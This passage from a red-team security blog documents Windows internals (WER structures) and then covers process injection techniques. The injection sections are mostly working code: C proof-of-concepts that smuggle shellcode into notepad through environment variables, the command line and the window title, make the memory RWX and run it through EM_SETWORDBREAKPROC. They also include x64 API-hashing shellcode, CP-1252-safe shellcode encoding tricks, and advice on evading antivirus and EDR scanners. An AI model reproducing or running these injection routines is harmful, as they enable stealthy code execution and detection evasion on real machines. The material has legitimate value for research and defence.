} RTL_VECTORED_HANDLER_LIST, *PRTL_VECTORED_HANDLER_LIST;

// exception handler entry
typedef struct _RTL_VECTORED_EXCEPTION_ENTRY {
    LIST_ENTRY                  List;
    PULONG_PTR                  Flag;           // some flag related to CFG
    ULONG                       RefCount;
    PVECTORED_EXCEPTION_HANDLER VectoredHandler;
} RTL_VECTORED_EXCEPTION_ENTRY, *PRTL_VECTORED_EXCEPTION_ENTRY;

8. Windows Error Reporting (WER)

Windows provides API to enable application recovery, dumping process memory and generating reports via the WER service. WER settings for a process can be located within the Process Environment Block (PEB) at WerRegistrationData.

8.1 PEB Header Block

I’ll discuss structures separately, but for the few that aren’t. Signature is set internally by kernelbase!WerpInitPEBStore and simply contains the string “PEB_SIGNATURE”. AppDataRelativePath is set by WerRegisterAppLocalDump. kernelbase!RegisterApplicationRestart can be used to set RestartCommandLine, which is used as the command line when the process is to be eh..restarted. 🙂

typedef struct _WER_PEB_HEADER_BLOCK {
    LONG                 Length;
    WCHAR                Signature[16];
    WCHAR                AppDataRelativePath[64];
    WCHAR                RestartCommandLine[RESTART_MAX_CMD_LINE];
    WER_RECOVERY_INFO    RecoveryInfo;
    PWER_GATHER          Gather;
    PWER_METADATA        MetaData;
    PWER_RUNTIME_DLL     RuntimeDll;
    PWER_DUMP_COLLECTION DumpCollection;
    LONG                 GatherCount;
    LONG                 MetaDataCount;
    LONG                 DumpCount;
    LONG                 Flags;
    WER_HEAP_MAIN_HEADER MainHeader;
    PVOID                Reserved;
} WER_PEB_HEADER_BLOCK, *PWER_PEB_HEADER_BLOCK;

8.2 Recovery Information

A recovery callback can be installed using kernel32!RegisterApplicationRecoveryCallback. kernelbase!GetApplicationRecoveryCallback will read the Callback, Parameter, PingInterval and Flags from a remote process. kernel32!ApplicationRecoveryFinished can read if the Finished event is signalled. ApplicationRecoveryInProgress will determine if the InProgress event is signalled. Started is a handle, but I’m unsure what it’s for exactly.

typedef struct _WER_RECOVERY_INFO {
    ULONG                Length;
    PVOID                Callback;
    PVOID                Parameter;
    HANDLE               Started;
    HANDLE               Finished;
    HANDLE               InProgress;
    LONG                 LastError;
    BOOL                 Successful;
    DWORD                PingInterval;
    DWORD                Flags;
} WER_RECOVERY_INFO, *PWER_RECOVERY_INFO;

8.3 Gathers

As part of a report created by WER, kernelbase!WerRegisterMemoryBlock inserts information about a range of memory that should be included. It’s also possible to exclude a range of memory using kernelbase!WerRegisterExcludedMemoryBlock, which internally sets bit 15 of the Flags in a WER_GATHER structure. Files that might otherwise be excluded from a report can also be saved via kernelbase!WerRegisterFile.

typedef struct _WER_FILE {
    USHORT               Flags;
    WCHAR                Path[MAX_PATH];
} WER_FILE, *PWER_FILE;

typedef struct _WER_MEMORY {
    PVOID                Address;
    ULONG                Size;
} WER_MEMORY, *PWER_MEMORY;

typedef struct _WER_GATHER {
    PVOID                Next;
    USHORT               Flags;    
    union {
      WER_FILE           File;
      WER_MEMORY         Memory;
    } v;
} WER_GATHER, *PWER_GATHER;

8.4 Custom Meta Data

Applications can register custom meta data using kernelbase!WerRegisterCustomMetadata.

typedef struct _WER_METADATA {
    PVOID                Next;
    WCHAR                Key[64];
    WCHAR                Value[128];
} WER_METADATA, *PWER_METADATA;

8.5 Runtime DLL

Developers might want to customize the reporting process and that’s what kernelbase!WerRegisterRuntimeExceptionModule is for. It inserts the path of DLL into the registration data that’s loaded by werfault.exe once an exception occurs. In the WER_RUNTIME_DLL structure, MAX_PATH is used for CallbackDllPath, but the correct length for the structure and DLL should be read from the Length field.

typedef struct _WER_RUNTIME_DLL {
    PVOID                Next;
    ULONG                Length;
    PVOID                Context;
    WCHAR                CallbackDllPath[MAX_PATH];
} WER_RUNTIME_DLL, *PWER_RUNTIME_DLL;

8.6 Dump Collections

If more than one process is required for dumping, an application can use kernelbase!WerRegisterAdditionalProcess to specify the process and thread ids. I’m open to correction, but it appears that only one thread per process is allowed by the API.

typedef struct _WER_DUMP_COLLECTION {
    PVOID                Next;
    DWORD                ProcessId;   
    DWORD                ThreadId; 
} WER_DUMP_COLLECTION, *PWER_DUMP_COLLECTION;

8.7 Heap Main Header

Finally, the main heap header used for dynamic allocation of memory for WER structures. The signature here should contain a string “HEAP_SIGNATURE”. The mutex is simply for exclusive access during allocations. FreeHeap may be inaccurate, but it appears to be used to improve performance of memory allocations. Instead of requesting a new block of memory from the OS, WER functions can use from this block if possible.

typedef struct _WER_HEAP_MAIN_HEADER {
    WCHAR                Signature[16];
    LIST_ENTRY           Links;
    HANDLE               Mutex;
    PVOID                FreeHeap;
    ULONG                FreeCount;
} WER_HEAP_MAIN_HEADER, *PWER_HEAP_MAIN_HEADER;

The WER service could be a point of privilege escalation and lateral movement. There’s potential to use it for exfiltration of sensitive data by modifying information in the registry settings. An attacker may be capable of dumping a process and having a report sent to a server they control using the CorporateWERServer setting. They might also use their own public key to encrypt this data and prevent recovery of what exactly is being gathered. This is all hypothetical of course and I don’t know if it can actually be used for this.

Posted in data structures, redteam, security | Tagged callbacks, data structures, wer, windows | 1 Comment

Windows Process Injection: Command Line and Environment Variables

Posted on July 31, 2020 by odzhan

Windows Process Injection: Command Line and Environment Variables

Introduction
Shellcode
Environment Variables
Command Line
Window Title
Runtime Data

1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;                            //0x0
    ULONG Length;                                   //0x4
    ULONG Flags;                                    //0x8
    ULONG DebugFlags;                               //0xc
    PVOID ConsoleHandle;                            //0x10
    ULONG ConsoleFlags;                             //0x18
    PVOID StandardInput;                            //0x20
    PVOID StandardOutput;                           //0x28
    PVOID StandardError;                            //0x30
    CURDIR CurrentDirectory;                        //0x38
    UNICODE_STRING DllPath;                         //0x50
    UNICODE_STRING ImagePathName;                   //0x60
    UNICODE_STRING CommandLine;                     //0x70
    PVOID Environment;                              //0x80
    ULONG StartingX;                                //0x88
    ULONG StartingY;                                //0x8c
    ULONG CountX;                                   //0x90
    ULONG CountY;                                   //0x94
    ULONG CountCharsX;                              //0x98
    ULONG CountCharsY;                              //0x9c
    ULONG FillAttribute;                            //0xa0
    ULONG WindowFlags;                              //0xa4
    ULONG ShowWindowFlags;                          //0xa8
    UNICODE_STRING WindowTitle;                     //0xb0
    UNICODE_STRING DesktopInfo;                     //0xc0
    UNICODE_STRING ShellInfo;                       //0xd0
    UNICODE_STRING RuntimeData;                     //0xe0
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
    ULONG EnvironmentSize;                          //0x3f0
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

      bits 64
      
      %include "include.inc"
      
      struc stk_mem
        .hs                   resb home_space_size
        
        .bInheritHandles      resq 1
        .dwCreationFlags      resq 1
        .lpEnvironment        resq 1
        .lpCurrentDirectory   resq 1
        .lpStartupInfo        resq 1
        .lpProcessInformation resq 1
        
        .procinfo             resb PROCESS_INFORMATION_size
        .startupinfo          resb STARTUPINFO_size
      endstruc

      %define stk_size ((stk_mem_size + 15) & -16) - 8
      
      %ifndef BIN
        global createproc
      %endif
      
      ; void createproc(WCHAR cmd[]);
createproc:
      ; save non-volatile registers
      pushx  rsi, rbx, rdi, rbp
      
      ; allocate stack memory for arguments + home space
      xor    eax, eax
      mov    al, stk_size
      sub    rsp, rax
      
      ; save pointer to buffer
      push   rcx
      
      push   TEB.ProcessEnvironmentBlock
      pop    r11
      mov    rax, [gs:r11]
      mov    rax, [rax+PEB.Ldr]
      mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    scan_dll
next_dll:    
      mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
scan_dll:
      mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

      mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
      add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
      ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
      mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress - \
                           TEB.ProcessEnvironmentBlock]
      jecxz  next_dll              ; if no exports, try next DLL in list
      ; rsi = offset IMAGE_EXPORT_DIRECTORY.Name 
      lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd                        ; eax = NumberOfNames
      xchg   eax, ecx
      jecxz  next_dll              ; if no names, try next DLL in list
      
      ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      lodsd
      xchg   eax, r8d              ;
      add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      xchg   eax, ebp              ;
      add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
      ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      xchg   eax, r9d
      add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
find_api:
      mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
      add    rsi, rbx
      xor    eax, eax
      cdq
hash_api:
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    al
      jns    hash_api
      cmp    edx, 0x1b929a47       ; CreateProcessW
      loopne find_api              ; loop until found or no names left
      
      jnz    next_dll              ; not found? goto next_dll
      
      movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
      mov    eax, [r8+rax*4]
      add    rbx, rax              ; rbx += AddressOfFunctions[rdx]
      
      ; CreateProcess(NULL, cmd, NULL, NULL, 
      ;   FALSE, 0, NULL, &si, &pi);
      pop    rdx           ; lpCommandLine = buffer for Edit
      xor    r8, r8        ; lpProcessAttributes = NULL
      xor    r9, r9        ; lpThreadAttributes = NULL
      xor    eax, eax
      mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
      mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
      mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
      mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
      
      lea    rdi, [rsp+stk_mem.procinfo       ]
      mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi

      lea    rdi, [rsp+stk_mem.startupinfo    ]
      mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
      
      xor    ecx, ecx
      push   STARTUPINFO_size
      pop    rax
      stosd                         ; si.cb = sizeof(STARTUPINFO)
      sub    rax, 4
      xchg   eax, ecx
      rep    stosb
      call   rbx
      
      ; deallocate stack
      xor    eax, eax
      mov    al, stk_size
      add    rsp, rax
      xor    eax, eax
      
      ; restore non-volatile registers
      popx   rsi, rbx, rdi, rbp  
      ret

3. Environment Variables

Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

There’s a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

// return relative virtual address of environment block
DWORD get_var_rva(PWCHAR name) {
    PVOID  env;
    PWCHAR str, var;
    DWORD  rva = 0;
    
    // find the offset of value for environment variable
    env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
    str = (PWCHAR)env;
    
    while(*str != 0) {
      // our name?
      if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
        var = wcsstr(str, L"=") + 1;
        // calculate RVA of value
        rva = (PBYTE)var - (PBYTE)env;
        break;
      }
      // advance to next entry
      str += wcslen(str) + 1;
    }
    return rva;
}

Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

// get the address of environment block
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of Environment block 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *envlen = upp.EnvironmentSize;
    return upp.Environment;
}

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

Figure 1. Environment variable of new process containing shellcode.

void var_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               name[MAX_PATH]={0};    
    INT                 i; 
    PVOID               va;
    DWORD               rva, old, len;
    PVOID               env;
    HWND                npw, ecw;

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct Environment address from new process    
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of environment block in new process
    // then calculate the address of shellcode
    env = var_get_env(pi.hProcess, &len);
    va = (PBYTE)env + get_var_rva(name);

    // set environment block to RWX
    VirtualProtectEx(pi.hProcess, env, 
      len, PAGE_EXECUTE_READWRITE, &old);

    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
cleanup:
    // cleanup and exit
    SetEnvironmentVariable(name, NULL);
    
    if(pi.hProcess != NULL) {
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
    }
}

4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

// get the address of command line
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of command line 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *cmdlen = upp.CommandLine.Length;
    return upp.CommandLine.Buffer;
}

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

Figure 2. Command line of new process containing shellcode.

#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

void cmd_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               path[MAX_PATH]={0};
    DWORD               rva, old, len;
    PVOID               cmdline;
    HWND                npw, ecw;

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct command line from new process  
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of command line in new process
    // which contains our shellcode
    cmdline = get_cmdline(pi.hProcess, &len);
    
    // set the address to RWX
    VirtualProtectEx(pi.hProcess, cmdline, 
      len, PAGE_EXECUTE_READWRITE, &old);
    
    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

5. Window Title

IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

    // create a new process using shellcode as window title
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    si.lpTitle     = (PWCHAR)WINEXEC;

6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, “Reserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

While it didn’t work for me, that’s not to say it can’t work with some additional tweaking. Sources

Posted in assembly, injection, malware, process injection, programming, redteam, security, shellcode, windows | Tagged command line, environment variables, peb, shellcode, windows, windows process injection | 1 Comment

Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC

Posted on July 7, 2020 by odzhan

Introduction
Edit Controls
Writing CP-1252 Compatible Code

Initialization
Set RAX to 0
Set RAX to 1
Set RAX to -1
Load and Store Data
Two Byte Instructions
Prefix Codes

Generating Shellcode
Injecting and Executing
Demonstration
Encoding Arbitrary Data

Encoding
Decoding

Acknowledgements
Further Research
Scrapheap

1. Introduction

‘Shatter attacks’ use Window messages for privilege escalation and were first described in August 2002 by Kristin Paget. Early examples demonstrated using WM_SETTEXT for injection of code and WM_TIMER to execute it. While Microsoft attempted to address the problem with a patch in December 2002, Oliver Lavery later demonstrated how EM_SETWORDBREAKPROC can also execute code. Kristin Paget delivered a followup paper and presentation in August 2003 describing other messages for code redirection. Brett Moore also published a paper in October 2003 that includes a comprehensive list of all messages that could be used for both injection and redirection.

Without focusing on the design of Windows itself, Shatter attacks were possible for two reasons: No isolation between processes sharing the same interactive desktop, and for allowing code to run from the stack and heap. Starting with Windows Vista and Server 2008, User Interface Privilege Isolation (UIPI) solves the first problem by defining a set of UI privilege levels to prevent a low-privileged process sending messages to a high-privileged process. Data Execution Prevention (DEP) , which was introduced earlier in Windows XP Service Pack 2, solves the second problem. With both features enabled, Shatter attacks are no longer effective. Although DEP and UIPI block Shatter attacks, they do not prevent using window messages for code injection.

ESET recently published a paper on the Invisimole malware, drawing attention to its use of LVM_SETITEMPOSITION and LVM_GETITEMPOSITION for injection and LVM_SORTITEMS for execution. Using LVM_SORTITEMS to execute code was first suggested by Kristin Paget at Blackhat 2003 and later rediscovered by Adam. PoC codes were published in a previous blog entry here, and by Csaba Fitzl here.

For this post, I’ve written a PoC that does the following:

Use the clipboard and WM_PASTE message to inject code into the notepad process.
Use the EM_GETHANDLE message and ReadProcessMemory to obtain the buffer address of our code.
Use VirtualProtectEx to change memory permissions from Read-Write to Read-Write-Execute.
Use the EM_SETWORDBREAKPROC and WM_LBUTTONDBLCLK to execute shellcode.

Although VirtualProtectEx is used, it may be possible to run notepad with DEP disabled. It’s also worth pointing out the shellcode is designed for CP-1252 encoding rather than UTF-8 encoding, so the PoC may not work on every system. The injection method will succeed, but notepad is likely to crash after the conversion to unicode.

2. Edit Controls

Adam writes in Talking to, and handling (edit) boxes about code injection via edit controls and using EM_GETHANDLE to obtain the address of where the code is stored. Using notepad as an example, one can open a file containing executable code or use the clipboard and the WM_PASTE message to inject into notepad.

To show where the edit control input is stored in memory, run notepad and type in “modexp”. Attach WinDbg and type in the following command: !address /f:Heap /c:”s -u %1 %2 \”modexp\””. This will search heap memory for the Unicode string “modexp”. Why Unicode? Since Comctl32.dll version 6, controls only use Unicode. Figure 1 shows the output of this command.

Figure 1. Searching memory for the string in Notepad.

To read the edit control handle, we send EM_GETHANDLE to the window handle. Alternatively, you can use GetWindowLongPtr(0) and ReadProcessMemory(ULONG_PTR), but EM_GETHANDLE will do it in one call. Figure 2 shows the result of executing the following code.

    hw = FindWindow("Notepad", NULL);
    hw = FindWindowEx(hw, NULL, "Edit", NULL);
    emh = (PVOID)SendMessage(hw, EM_GETHANDLE, 0, 0); 
    printf("EM Handle : %p\n", emh);

Figure 2. The memory pointer returned by EM_GETHANDLE

The handle points to the buffer allocated for input as you can see in Figure 3.

Figure 3. Buffer allocated for input.

Since the input is stored in Unicode format, it’s not possible to just copy any shellcode to the clipboard and paste into the edit control. On my system, notepad converts the clipboard data to Unicode using the CP_ACP codepage, which is using Windows-1252 (CP-1252) encoding. CP-1252 is a single byte character set used by default in legacy components of Microsoft Windows for languages derived from the Latin alphabet. When notepad receives the WM_PASTE message, it invokes GetClipboardData() with CF_UNICODETEXT as the format. Internally, this invokes GetClipboardCodePage(), which on my system returns CP_ACP, before invoking MultiByteToWideChar() converting the text into Unicode format. For CF_TEXT format, ensure the code you copy to the clipboard doesn’t contain characters in the ranges [0x80, 0x8C], [0x91, 0x9C] or 0x8E, 0x9E and 0x9F. These “bad characters” will be converted to double byte character encodings. For UTF-8, only bytes in range [0x00, 0x7F] can be used.

NOTE: You can paste shellcode as CF_UNICODETEXT and avoid writing complex Ansi shellcode as I have in this post. Just ensure to avoid two consecutive null bytes that indicate string termination. e.g “\x00\x00”

3. Writing CP-1252 Compatible Code

If writing Ansi shellcode that will be converted to Unicode before execution, let’s start by looking at x86/x64 instructions that can be used safely after conversion by MultiByteToWideChar() using CP_ACP as the code page.

3.1 Initialization

Throughout the code, you’ll see the following.

"\x00\x4d\x00"         /* add   byte [rbp], cl */

Consider it a NOP instruction because it’s only intended to insert null bytes between other instructions so that the final assembly code in Ansi is compatible with CP-1252 encoding. Using BP requires three bytes and can be used almost right away.

Well, that last statement is not entirely true. For 32-Bit mode, creating a stack frame is a normal part of any procedure and authors of older articles on Unicode shellcode rightly presume BP contains the value of the Stack Pointer (SP). Unless BP was unexpectedly overwritten, any write operations with this instruction on 32-Bit systems won’t cause an exception. However, the same cannot be said for 64-Bit, which depending on the compiler normally avoids using BP to address local variables. For that reason, we must copy SP to BP ourselves before doing anything else. The only instruction between 1-5 bytes I could identify as a solution to this was ENTER. Another thing we do is set AL to 0, so that we’re not overwriting anything on the stack address RBP contains. The following allocates 256 bytes of memory and copies SP to BP.

    ; ************************* prolog
    mov    al, 0
    enter  256, 0
    
    ; save rbp
    push   rbp
    add    [rbp], al
    
    ; create local variable for rbp
    push   0
    push   rsp
    add    [rbp], al
    
    pop    rbp
    add    [rbp], cl

If we examine the EDITWORDBREAKPROCA callback function, we can see lpch is a pointer to the text of the edit control.

EDITWORDBREAKPROCA EDITWORDBREAKPROCA;

int EDITWORDBREAKPROCA(
  LPSTR lpch,
  int ichCurrent,
  int cch,
  int code
)
{...}

If you’re familiar with the Microsoft fastcall convention for x64 mode, you’ll already know the first four arguments are placed in RCX, RDX, R8 and R9. This callback will load lpch into RCX. This will be useful later.

3.2 Set RAX to 0

PUSH 0 creates a local variable on the stack and assigns zero to it. The variable is then loaded with POP RAX.

"\x6a\x00"             /* push  0                   */
"\x58"                 /* pop   rax                 */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Subtract 0xFF00FF00. It should be noted that these operations will zero out the upper 32-bits of RAX and are insufficient for adding and subtracting with memory addresses.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x2d\x00\xff\x00\xff" /* sub   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFF00FF00 to EAX. Bitwise XOR with 0xFF00FF00.

"\xb8\x00\xff\x00\xff" /* mov   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x35\x00\xff\x00\xff" /* xor   eax, 0xff00ff00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

Copy 0xFE00FE00 to EAX. Bitwise AND with 0x01000100.

"\xb8\x00\xfe\x00\xfe" /* mov   eax, 0xfe00fe00     */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */
"\x25\x00\x01\x00\x01" /* and   eax, 0x01000100      */
"\x00\x4d\x00"         /* add   byte [rbp], cl      */

3.3 Set RAX to 1

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. INC DWORD[RAX] assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"     /* push 0              */
"\x54"         /* push rsp            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */
"\xff\x00"     /* inc  dword [rax]    */
"\x58"         /* pop  rax            */
"\x00\x4d\x00" /* add  byte [rbp], cl */

PUSH 0 creates a local variable we’ll call X and assigns a value of 0. PUSH RSP creates a local variable we’ll call A and assigns the address of X. POP RAX loads A into the RAX register. MOV BYTE[RAX], 1 assigns 1 to X. POP RAX loads X into the RAX register.

"\x6a\x00"         /* push  0              */
"\x54"             /* push  rsp            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\xc6\x00\x01"     /* mov   byte [eax], 1  */
"\x00\x4d\x00"     /* add   byte [rbp], cl */
"\x58"             /* pop   rax            */
"\x00\x4d\x00"     /* add   byte [rbp], cl */

3.4 Set RAX to -1

